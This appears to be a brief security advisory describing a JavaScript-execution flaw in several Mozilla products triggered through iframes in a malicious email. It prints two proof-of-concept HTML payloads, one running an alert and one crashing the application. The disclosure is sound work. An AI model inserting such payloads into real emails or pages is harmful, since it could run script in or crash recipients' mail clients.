|
|
Multiple Mozilla Products IFRAME JavaScript Execution Vulnerability
This issue can be exploited by sending a malicious email. The following proof of concept is available: * Javascript execution : <html> <body> <iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe> </body> </html> * Denial of service (application crash) : <html> <body> <iframe src="javascript:parent.document.write('Found by www.sysdream.com !')"></iframe> </body> </html> |
|
Privacy Statement |